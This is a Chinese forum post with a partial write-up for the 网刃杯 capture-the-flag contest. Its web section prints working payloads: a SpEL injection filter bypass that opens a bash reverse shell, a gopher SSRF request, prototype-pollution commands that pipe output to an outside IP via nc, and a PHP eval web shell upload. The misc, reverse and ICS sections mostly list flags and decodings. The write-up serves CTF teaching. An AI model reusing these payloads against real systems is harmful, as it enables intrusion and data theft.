安全矩阵

 找回密码
 立即注册
搜索
查看: 2140|回复: 0

网刃杯赛题-部分WP

[复制链接]

180

主题

231

帖子

1176

积分

金牌会员

Rank: 6Rank: 6

积分
1176
发表于 2022-4-27 22:59:39 | 显示全部楼层 |阅读模式

网刃杯赛题-部分WP

一、
WEB类
ez_java
能下源码文件,下载 web.xml 找到 TestServlet.class 文件,路径是 test388
/download?filename=../../../classes/com/abc/servlet/TestServlet.class
  1. //
  2. // Source code recreated from a .class file by IntelliJ IDEA
  3. // (powered by Fernflower decompiler)
  4. //

  5. package com.abc.servlet;

  6. import java.io.IOException;
  7. import java.util.regex.Matcher;
  8. import java.util.regex.Pattern;
  9. import javax.servlet.ServletException;
  10. import javax.servlet.http.HttpServlet;
  11. import javax.servlet.http.HttpServletRequest;
  12. import javax.servlet.http.HttpServletResponse;
  13. import org.springframework.expression.Expression;
  14. import org.springframework.expression.ParserContext;
  15. import org.springframework.expression.common.TemplateParserContext;
  16. import org.springframework.expression.spel.standard.SpelExpressionParser;
  17. import org.springframework.expression.spel.support.StandardEvaluationContext;

  18. public class TestServlet extends HttpServlet {
  19.     public TestServlet() {
  20.     }

  21.     protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
  22.         this.doPost(req, resp);
  23.     }

  24.     protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
  25.         try {
  26.             String name = request.getParameter("name");
  27.             name = new String(name.getBytes("ISO8859-1"), "UTF-8");
  28.             if (this.blackMatch(name)) {
  29.                 request.setAttribute("message", "name is invalid");
  30.                 request.getRequestDispatcher("/message.jsp").forward(request, response);
  31.                 return;
  32.             }

  33.             System.out.println(name);
  34.             String message = this.getAdvanceValue(name);
  35.             request.setAttribute("message", message);
  36.             request.getRequestDispatcher("/message.jsp").forward(request, response);
  37.         } catch (Exception var5) {
  38.             request.setAttribute("message", "error");
  39.             request.getRequestDispatcher("/message.jsp").forward(request, response);
  40.         }

  41.     }

  42.     private boolean blackMatch(String val) {
  43.         String[] var2 = this.getBlacklist();
  44.         int var3 = var2.length;

  45.         for(int var4 = 0; var4 < var3; ++var4) {
  46.             String keyword = var2[var4];
  47.             Matcher matcher = Pattern.compile(keyword, 34).matcher(val);
  48.             if (matcher.find()) {
  49.                 return true;
  50.             }
  51.         }

  52.         return false;
  53.     }

  54.     private String getAdvanceValue(String val) {
  55.         ParserContext parserContext = new TemplateParserContext();
  56.         SpelExpressionParser parser = new SpelExpressionParser();
  57.         Expression exp = parser.parseExpression(val, parserContext);
  58.         StandardEvaluationContext evaluationContext = new StandardEvaluationContext();
  59.         return exp.getValue(evaluationContext).toString();
  60.     }

  61.     private String[] getBlacklist() {
  62.         return new String[]{"java.+lang", "Runtime", "exec.*\\("};
  63.     }
  64. }
复制代码

绕一下过滤
  1. #{''.getClass().forName('java.lan'+'g.Run'+'time').getMethod('exe'+'c',''.getClass()).invoke(''.getClass().forName('java.lan'+'g.Run'+'time').getMethod('getRun'+'time').invoke(null),'bash -c bash$IFS$9-i>&/dev/tcp/xxx.xxx.xxx.xxx/5555<&1')
复制代码

弹回到vps里
  1. POST /test388?name=%23%7b%27%27%2e%67%65%74%43%6c%61%73%73%28%29%2e%66%6f%72%4e%61%6d%65%28%27%6a%61%76%61%2e%6c%61%6e%27%2b%27%67%2e%52%75%6e%27%2b%27%74%69%6d%65%27%29%2e%67%65%74%4d%65%74%68%6f%64%28%27%65%78%65%27%2b%27%63%27%2c%27%27%2e%67%65%74%43%6c%61%73%73%28%29%29%2e%69%6e%76%6f%6b%65%28%27%27%2e%67%65%74%43%6c%61%73%73%28%29%2e%66%6f%72%4e%61%6d%65%28%27%6a%61%76%61%2e%6c%61%6e%27%2b%27%67%2e%52%75%6e%27%2b%27%74%69%6d%65%27%29%2e%67%65%74%4d%65%74%68%6f%64%28%27%67%65%74%52%75%6e%27%2b%27%74%69%6d%65%27%29%2e%69%6e%76%6f%6b%65%28%6e%75%6c%6c%29%2c%27%62%61%73%68%20%2d%63%20%62%61%73%68%24%49%46%53%24%39%2d%69%3e%26%2f%64%65%76%2f%74%63%70%2f%38%32%2e%31%35%37%2e%31%36%31%2e%31%38%37%2f%35%35%35%35%3c%26%31%27%29%7d HTTP/1.1
  2. Host: 124.220.9.19:8024
  3. Cache-Control: max-age=0
  4. Upgrade-Insecure-Requests: 1
  5. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
  6. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  7. Accept-Encoding: gzip, deflate
  8. Accept-Language: zh-CN,zh;q=0.9
  9. Connection: close
  10. Content-Type: application/x-www-form-urlencoded
  11. Content-Length: 0
复制代码


SIGNIN
能读文件

172.73.25.21 附近的ip没有web服务
翻 arp 记录,找到另一个 web

gopher协议post传参

硬套
  1. GET /?url=gopher://172.73.25.100:80/_POST%2520/%253Fa%253D1%2520HTTP/1.1%250D%250AHost%253A%2520172.73.25.100%250D%250AUser-Agent%253A%2520Mozilla/5.0%2520%2528Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%253B%2520rv%253A87.0%2529%2520Gecko/20100101%2520Firefox/87.0%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AReferer%253A%2520bolean.club%250D%250AX-Forwarded-For%253A%2520127.0.0.1%250D%250AX-Originating-IP%253A%2520127.0.0.1%250D%250AX-Remote-IP%253A%2520127.0.0.1%250D%250AX-Remote-Addr%253A%2520127.0.0.1%250D%250AContent-Length%253A%25203%250D%250A%250D%250Ab%253D2%250D%250A HTTP/1.1
  2. Host: 124.220.9.19:20002
  3. Upgrade-Insecure-Requests: 1
  4. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
  5. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  6. Accept-Encoding: gzip, deflate
  7. Accept-Language: zh-CN,zh;q=0.9
  8. Connection: close
复制代码

ezjs
http://124.222.24.150:10002/
空格被拦了用 ${IFS} 替代
  1. POST / HTTP/1.1
  2. Host: 124.222.173.163:10002
  3. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0
  4. Accept: image/webp,*/*
  5. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  6. Accept-Encoding: gzip, deflate
  7. Connection: close
  8. Referer: http://124.222.173.163:10002/
  9. X-Forwarded-For: localhost
  10. Content-Type: application/json
  11. Content-Length: 149

  12. {"__proto__":{"sourceURL":"\nglobal.process.mainModule.constructor._load('child_process')
复制代码
  1. .exec('ls${IFS}-al${IFS}|nc${IFS}152.136.230.235:8000')//"}}
复制代码

flag在/.flag
  1. 简单fuzz发现被拦截: * = flag less cat tac tail nl
复制代码

发现od没拦截 flag关键字可以用fla\\g替换
以十六进制输出
  1. POST / HTTP/1.1
  2. Host: 124.222.173.163:10002
  3. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0
  4. Accept: image/webp,*/*
  5. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  6. Accept-Encoding: gzip, deflate
  7. Connection: close
  8. Referer: http://124.222.173.163:10002/
  9. X-Forwarded-For: localhost
  10. Content-Type: application/json
  11. Content-Length: 158

  12. {"__proto__":{"sourceURL":"\nglobal.process.mainModule.constructor._load('child_process').
复制代码
  1. exec('od${IFS}-tx1${IFS}/.fla\\g|nc${IFS}152.136.230.235:8000')//"}}
复制代码
手动把偏移位删掉,010新建十六进制文件,得到flag
upload
  1. POST / HTTP/1.1
  2. Host: 124.220.9.19:8002
  3. Content-Length: 226
  4. Cache-Control: max-age=0
  5. Upgrade-Insecure-Requests: 1
  6. Origin: http://124.220.9.19:8002
  7. Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryD87uydBACUiWGZBm
  8. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
  9. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  10. Referer: http://124.220.9.19:8002/
  11. Accept-Encoding: gzip, deflate
  12. Accept-Language: zh-CN,zh;q=0.9
  13. Connection: close

  14. ------WebKitFormBoundaryD87uydBACUiWGZBm
  15. Content-Disposition: form-data; name="upfile"; filename="p7.php"
  16. Content-Type: ctf

  17. <?php @eval($_POST['pass']);echo "Hello world!"; ?>
  18. ------WebKitFormBoundaryD87uydBACUiWGZBm--
复制代码


说是不解析,但实际上肯定解析了,而且返回的也不是文件本身
猜测是从数据库在判断规则交互
文件名是注入点
直接猜flag表flag字段
flag{5937a0b90b5966939cccd36929
查右边
}aa86c192963dccc9396695b09b0a73
flag{5937a0b90b5966939cccd369291c68aa}

二、
MISC
xyp07
压缩包内注释
  1. Vm0weGQxRXlTWGxVV0d4V1YwZFNVRlpyV25kWlZsSllZMFZrVmxKdVFsaFdNalZMWWtkS1IxTnFSbGhYU0VKNlZsWmFWMVpWTVVWaGVqQTk=
复制代码

解码后得到
压缩包密码 Xyp77&7&77
wireshark 打开,过滤条件
  1. cotp && cotp.type == 0x0f && s7comm.header.rosctr == 1 && s7comm.param.func == 0x05
复制代码

数据包 1425 有问题

iPE=e>we,9:={]RnBjf<7_8Cw1b
base91解码
welcome_S7_world_xyp07
flag{welcome_S7_world_xyp07}

三、
REVERSE
freestyle
计算可知为3327
计算可知为105
flag{31a364d51abd0c8304106c16779d83b1}

四、
ICSeasyice
搜字符串flag即可
carefulguy
拼起来

666c61677b7034757333313576337279316e7433726573746963397d
flag{p4us315v3ry1nt3restic9}

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-3-29 08:23 , Processed in 0.016533 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表